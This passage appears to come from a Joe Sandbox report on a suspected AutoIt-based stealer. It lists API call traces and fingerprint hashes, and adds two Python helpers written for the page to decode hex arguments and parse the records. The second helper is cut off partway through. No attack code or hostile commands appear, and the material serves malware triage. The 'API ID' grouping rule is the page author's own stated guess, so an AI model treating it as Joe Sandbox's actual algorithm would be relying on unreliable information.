• Instruction ID: 07a275fe8973462f8bec99e70eca3aa8cdcc8d52203b6a954619a6e71c39ab16
• Opcode Fuzzy Hash: 6a86107896316c37b62c18901f00f14cd47035e748bd8d8b1857b4418cb62fc8
• Instruction Fuzzy Hash: 5C1190B2150219BFEF119E64CC85EE77F5DEF09798F014111BA18A2190C7729C619BA4
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0010D7A3: _free.LIBCMT ref: 0010D7CC
• _free.LIBCMT ref: 0010D82D
  • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
  • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
• _free.LIBCMT ref: 0010D838
• _free.LIBCMT ref: 0010D843
• _free.LIBCMT ref: 0010D897
• _free.LIBCMT ref: 0010D8A2
• _free.LIBCMT ref: 0010D8AD
• _free.LIBCMT ref: 0010D8B8
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction ID: 135b7668ab1a7edf44fe74edd5e6d24757717b191838c25d4d2104079719e6fa
• Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction Fuzzy Hash: 0F115B71940B18AADA21BFF4DC4BFCB7BDCAF60704F404825F2D9A60D2DBB5B5058662
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0013DA74
• LoadStringW.USER32(00000000), ref: 0013DA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0013DA91
• LoadStringW.USER32(00000000), ref: 0013DA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0013DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0013DAB9
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: 3ce2d3968fd6db3c47bc2a30b713519d99c1aa769adc4cf540a49a0599e67d94
• Instruction ID: 31658baae930b5dfdabf23f88a1a7c7643e3c757e646c32634ef8888051fb7f2
• Opcode Fuzzy Hash: 3ce2d3968fd6db3c47bc2a30b713519d99c1aa769adc4cf540a49a0599e67d94
• Instruction Fuzzy Hash: CC0112F6500208BFEB119BA4DD89EF7766CE708701F404496F746E2441E7B49E848FB5
Uniqueness
Uniqueness Score: -1.00%

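The SendMessageW, GetStockObject and MessageBoxW arguments in the Msctls_Progress32 and MessageBoxW function records above are raw hex, which is what makes these records look opaque when triaging a report like this one. The Python below is an added decoder written for this page; it is not Joe Sandbox output and not code from the sample. It parses the report's API trace line format (including the "Part of subcall function" prefix) and names the values from the Windows SDK headers: WM_SETFONT, the PBM_* progress-bar messages (WM_USER+n, with PBM_SETBKCOLOR being CCM_SETBKCOLOR), CLR_DEFAULT, DEFAULT_GUI_FONT and the MB_* flags. The sample trace is the lines of those two records, embedded as constructed input.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: the API trace lines of the two function records above,
# copied as they appear in the report.
SAMPLE_TRACE = """\
Part of subcall function 000D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
Part of subcall function 000D600E: GetStockObject.GDI32(00000011), ref: 000D6060
Part of subcall function 000D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00164112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0016411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0016412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00164139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00164145
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0013DA91
LoadStringW.USER32(00000000), ref: 0013DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0013DADC
"""

# One trace line: optional "Part of subcall function X: " prefix, Api.Module(args), ref: addr
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Constants from the Windows SDK headers (winuser.h / commctrl.h / wingdi.h).
WM_SETFONT = 0x0030
WM_USER = 0x0400
CCM_FIRST = 0x2000
CLR_DEFAULT = 0xFF000000
DEFAULT_GUI_FONT = 17
MSG_NAMES = {
    WM_SETFONT: "WM_SETFONT",
    WM_USER + 1: "PBM_SETRANGE",
    WM_USER + 2: "PBM_SETPOS",
    WM_USER + 3: "PBM_DELTAPOS",
    WM_USER + 4: "PBM_SETSTEP",
    WM_USER + 5: "PBM_STEPIT",
    WM_USER + 6: "PBM_SETRANGE32",
    WM_USER + 7: "PBM_GETRANGE",
    WM_USER + 8: "PBM_GETPOS",
    WM_USER + 9: "PBM_SETBARCOLOR",
    CCM_FIRST + 1: "PBM_SETBKCOLOR",   # PBM_SETBKCOLOR is an alias of CCM_SETBKCOLOR
}
MB_BUTTONS = {0: "MB_OK", 1: "MB_OKCANCEL", 2: "MB_ABORTRETRYIGNORE",
              3: "MB_YESNOCANCEL", 4: "MB_YESNO", 5: "MB_RETRYCANCEL"}
MB_ICONS = {0x10: "MB_ICONERROR", 0x20: "MB_ICONQUESTION",
            0x30: "MB_ICONWARNING", 0x40: "MB_ICONINFORMATION"}
MB_MODIFIERS = ((0x1000, "MB_SYSTEMMODAL"), (0x2000, "MB_TASKMODAL"),
                (0x10000, "MB_SETFOREGROUND"), (0x40000, "MB_TOPMOST"))


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows '?' (value not recovered)
    ref: int
    subcall_of: Optional[int] = None


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one Joe Sandbox API trace line; return None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = [None if a == "?" else int(a, 16) for a in m["args"].split(",") if a]
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub)


def decode_messagebox_type(utype: int) -> str:
    """Expand a MessageBox uType value into its MB_* flag names."""
    parts = [MB_BUTTONS.get(utype & 0xF, f"buttons=0x{utype & 0xF:X}")]
    if utype & 0xF0:
        parts.append(MB_ICONS.get(utype & 0xF0, f"icon=0x{utype & 0xF0:X}"))
    parts += [name for bit, name in MB_MODIFIERS if utype & bit]
    return "|".join(parts)


def describe(call: ApiCall) -> str:
    """Turn the raw hex arguments of a call into a readable summary."""
    a = call.args
    if call.api == "SendMessageW" and len(a) > 1 and a[1] is not None:
        name = MSG_NAMES.get(a[1], f"msg=0x{a[1]:X}")
        wparam = a[2] if len(a) > 2 else None
        lparam = a[3] if len(a) > 3 else None
        if name == "PBM_SETRANGE" and lparam is not None:
            # lParam is MAKELPARAM(min, max): low word = min, high word = max
            return f"{name} min={lparam & 0xFFFF} max={(lparam >> 16) & 0xFFFF}"
        if name in ("PBM_SETBARCOLOR", "PBM_SETBKCOLOR") and lparam is not None:
            colour = "CLR_DEFAULT" if lparam == CLR_DEFAULT else f"0x{lparam:08X}"
            return f"{name} {colour}"
        if name in ("PBM_SETPOS", "PBM_SETSTEP") and wparam is not None:
            return f"{name} {wparam}"
        return name
    if call.api == "GetStockObject" and a and a[0] == DEFAULT_GUI_FONT:
        return "GetStockObject(DEFAULT_GUI_FONT)"
    if call.api == "MessageBoxW" and len(a) > 3 and a[3] is not None:
        return "MessageBoxW " + decode_messagebox_type(a[3])
    return f"{call.api}.{call.module}"


def decode_trace(text: str) -> List[Tuple[str, str]]:
    """Decode every parseable line; returns (ref address, summary) pairs in order."""
    out = []
    for line in text.splitlines():
        call = parse_line(line)
        if call is not None:
            out.append((f"{call.ref:08X}", describe(call)))
    return out


if __name__ == "__main__":
    for ref, summary in decode_trace(SAMPLE_TRACE):
        print(f"{ref}  {summary}")
```

Decoded, the first record creates a progress-bar control, sets DEFAULT_GUI_FONT on it, resets bar and background colour to CLR_DEFAULT, sets position 0, range 0..100 and step 1; the second builds a "%s (%d) : ==> %s: %s %s" message and shows it with MB_OK|MB_ICONERROR|MB_SYSTEMMODAL|MB_SETFOREGROUND. Both are ordinary GUI runtime code of the kind a compiled script interpreter carries, consistent with the "likely a compiled AutoIt script" signature in the report header, and are not where the stealer behaviour lives; the value of decoding them is to rule such records out quickly and spend the time on the injection and C2 records instead.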
APIs
• InterlockedExchange.KERNEL32(0108DE80,0108DE80), ref: 0014097B
• EnterCriticalSection.KERNEL32(0108DE60,00000000), ref: 0014098D
• TerminateThread.KERNEL32(?,000001F6), ref: 0014099B
• WaitForSingleObject.KERNEL32(?,000003E8), ref: 001409A9
• CloseHandle.KERNEL32(?), ref: 001409B8
• InterlockedExchange.KERNEL32(0108DE80,000001F6), ref: 001409C8
• LeaveCriticalSection.KERNEL32(0108DE60), ref: 001409CF
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
                                                                                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                                                                                          • Opcode ID: fe108b8ed92c0d5143553bb737f19f884eaf7611430bfa4c4cfa160fa317557d
                                                                                                                                                                                                                                          • Instruction ID: 700babacdded1ef0ad7f6d381aa9c29169dff708c78e3f39cf0cbbd584fdd6b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe108b8ed92c0d5143553bb737f19f884eaf7611430bfa4c4cfa160fa317557d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92F01D31442512ABD7425BA5EE98AE67A25BF05702F401015F24150CA0C7B594A5CFE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00151DC0
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00151DE1
• WSAGetLastError.WSOCK32 ref: 00151DF2
• htons.WSOCK32(?,?,?,?,?), ref: 00151EDB
• inet_ntoa.WSOCK32(?), ref: 00151E8C
  • Part of subcall function 001339E8: _strlen.LIBCMT ref: 001339F2
  • Part of subcall function 00153224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0014EC0C), ref: 00153240
• _strlen.LIBCMT ref: 00151F35
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: 3d6a0b65c1f0aaf0f535c37f10b2d85df6a1994ea5c966211a12c6d3320a8fa2
• Instruction ID: 1e0bd8aa1ba70ef2603b8f77a7644408deaad6b5bac12d7ac5a6730e7995d6e0
• Opcode Fuzzy Hash: 3d6a0b65c1f0aaf0f535c37f10b2d85df6a1994ea5c966211a12c6d3320a8fa2
• Instruction Fuzzy Hash: 68B1BC71204341AFC325DF24C885F6A7BA5AF84318F54894DF8665F2A2CB71ED4ACBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 000D5D30
• GetWindowRect.USER32(?,?), ref: 000D5D71
• ScreenToClient.USER32(?,?), ref: 000D5D99
• GetClientRect.USER32(?,?), ref: 000D5ED7
• GetWindowRect.USER32(?,?), ref: 000D5EF8
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: f1a7f5688bfa8589af6f8dee23a2418abb349ff904c0fc30051f6a3ac6e5da4e
• Instruction ID: df19fcd64fe3024a2e8341b2f34e52fd5dacb17cb5cbe46bfd960626b98d68e2
• Opcode Fuzzy Hash: f1a7f5688bfa8589af6f8dee23a2418abb349ff904c0fc30051f6a3ac6e5da4e
• Instruction Fuzzy Hash: F3B17D34A0074ADBDB28DFA9C8407EEB7F1FF58311F14851AE8A9D7250D730AA91DB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 001000BA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001000D6
• __allrem.LIBCMT ref: 001000ED
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0010010B
• __allrem.LIBCMT ref: 00100122
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00100140
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
• Instruction ID: f9d0646df1ee6995eec4566cfc50607caa9f34f6d1e809ed4284e24dcf8d7e27
• Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
• Instruction Fuzzy Hash: D4813A72A00B069BE7259F68CC41BBBB3E9AF59364F24413AF591D76C1E7F0D9408790
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000F82D9,000F82D9,?,?,?,0010644F,00000001,00000001,8BE85006), ref: 00106258
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0010644F,00000001,00000001,8BE85006,?,?,?), ref: 001062DE
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001063D8
• __freea.LIBCMT ref: 001063E5
  • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
• __freea.LIBCMT ref: 001063EE
• __freea.LIBCMT ref: 00106413
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                                                                                          • Opcode ID: f96aaf2f459fb1714b7164c18f06edf72c71266287e2e41b9a722aeac926f23f
                                                                                                                                                                                                                                          • Instruction ID: fc474a5468445a0886baaa890ecfa324947e0e986eced1c5215ce8a202be7363
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f96aaf2f459fb1714b7164c18f06edf72c71266287e2e41b9a722aeac926f23f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7851D172A00216ABEB258F64CC81EBF77A9FF54750F154629FC49DA1C0DBB4DCA0D6A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015BD25
• RegCloseKey.ADVAPI32(00000000), ref: 0015BD6A
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0015BD99
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0015BDF3
• RegCloseKey.ADVAPI32(?), ref: 0015BDFF
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
• Opcode ID: 1f6eb069d5d26a42fc8fefef0a56cfb7d2adbccd73bd530bb1d3dd5beab0efd0
• Instruction ID: ad337ae7896299589a50830d895a41b5b2825508c6ffd48d7b5e4670b76ec213
• Opcode Fuzzy Hash: 1f6eb069d5d26a42fc8fefef0a56cfb7d2adbccd73bd530bb1d3dd5beab0efd0
• Instruction Fuzzy Hash: 29815B31208241EFD714DF64C895E6ABBE5FF84308F14855DF8A94B2A2DB31ED49CB92
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(00000035), ref: 0012F7B9
• SysAllocString.OLEAUT32(00000001), ref: 0012F860
• VariantCopy.OLEAUT32(0012FA64,00000000), ref: 0012F889
• VariantClear.OLEAUT32(0012FA64), ref: 0012F8AD
• VariantCopy.OLEAUT32(0012FA64,00000000), ref: 0012F8B1
• VariantClear.OLEAUT32(?), ref: 0012F8BB
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
• Opcode ID: dac38101c98118f62fd7fffa85aa9b54919026e7b6c153808e1c5974282ed46f
• Instruction ID: b1fec4d2b716bf7476fa001f6879633afa390053d65f83761426984ba08bf86c
• Opcode Fuzzy Hash: dac38101c98118f62fd7fffa85aa9b54919026e7b6c153808e1c5974282ed46f
• Instruction Fuzzy Hash: 6D51B335500320AACF14AB65E895B79B3B4EF55314F21447FF805DF292DB708C95C7A6
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
  • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
• GetOpenFileNameW.COMDLG32(00000058), ref: 001494E5
• _wcslen.LIBCMT ref: 00149506
• _wcslen.LIBCMT ref: 0014952D
• GetSaveFileNameW.COMDLG32(00000058), ref: 00149585
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: f305eb0b9b032c8c8b1072035ab544dac3bac975f3812b71052bc0bc827edb73
• Instruction ID: e3204e9b7fcb650c04fbb95cc9927a47ff55c0536b676b22619cc07c2395e03f
• Opcode Fuzzy Hash: f305eb0b9b032c8c8b1072035ab544dac3bac975f3812b71052bc0bc827edb73
• Instruction Fuzzy Hash: 5CE192316083419FD724DF24C881AABB7E4BF85314F15856EF8899B3A2DB31DD05CBA2
Uniqueness
Uniqueness Score: -1.00%

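The function blocks above follow one fixed record layout: an "APIs" list in which calls reached through a callee are indented and prefixed "Part of subcall function", then the dump source, then the "Similarity" fingerprints. The parser below is an added example, not part of the Joe Sandbox report or its tooling; it extracts each function's ordered call chain from that layout and recomputes the "API ID" from the call names. The grouping rule (CamelCase fragments counted across all listed calls, most frequent group first, sorted within a group, groups joined by "$") and the dropped name fragments in STOP_TOKENS are inferred from the blocks on this page and are assumptions: they reproduce the registry, OLE-variant and file-dialog fingerprints shown above, but Joe Sandbox's own rule is not stated here and may differ for names not seen on this page. The two sample blocks in SAMPLE_REPORT are constructed by copying entries from the report section above.

```python
import re
from collections import Counter

# Constructed sample: two function blocks copied from the report section above
# (leading whitespace trimmed, "Download File" link residue removed).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
  • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015BD25
• RegCloseKey.ADVAPI32(00000000), ref: 0015BD6A
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0015BD99
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0015BDF3
• RegCloseKey.ADVAPI32(?), ref: 0015BDFF
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• API String ID: 1120388591-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• VariantInit.OLEAUT32(00000035), ref: 0012F7B9
• SysAllocString.OLEAUT32(00000001), ref: 0012F860
• VariantCopy.OLEAUT32(0012FA64,00000000), ref: 0012F889
• VariantClear.OLEAUT32(0012FA64), ref: 0012F8AD
• VariantCopy.OLEAUT32(0012FA64,00000000), ref: 0012F8B1
• VariantClear.OLEAUT32(?), ref: 0012F8BB
Similarity
• API ID: Variant$ClearCopy$AllocInitString
"""

# One call entry: optional subcall prefix, Api.MODULE, optional (args), ref: address.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

# Fragments the report's "API ID" evidently drops. Inferred from the blocks on
# this page (Reg/Key/Ex/W, Get/W, Sys, Rtl/To); an assumption, not a
# published Joe Sandbox rule set.
STOP_TOKENS = {"Reg", "Key", "Ex", "W", "Get", "Sys", "Rtl", "To"}


def api_tokens(name):
    """CamelCase fragments of a Win32 name minus STOP_TOKENS; lower-case CRT
    names such as _wcslen or __freea are kept whole."""
    if not any(ch.isupper() for ch in name):
        return [name]
    return [t for t in re.findall(r"[A-Z][a-z0-9]*", name) if t not in STOP_TOKENS]


def api_id_from_names(names):
    """Fragments grouped by occurrence count (highest first), sorted within a
    group, groups joined by '$'."""
    counts = Counter(tok for n in names for tok in api_tokens(n))
    by_count = {}
    for tok, c in counts.items():
        by_count.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(by_count[c])) for c in sorted(by_count, reverse=True))


def parse_blocks(text):
    """One dict per function block: parsed call list plus the reported API ID."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
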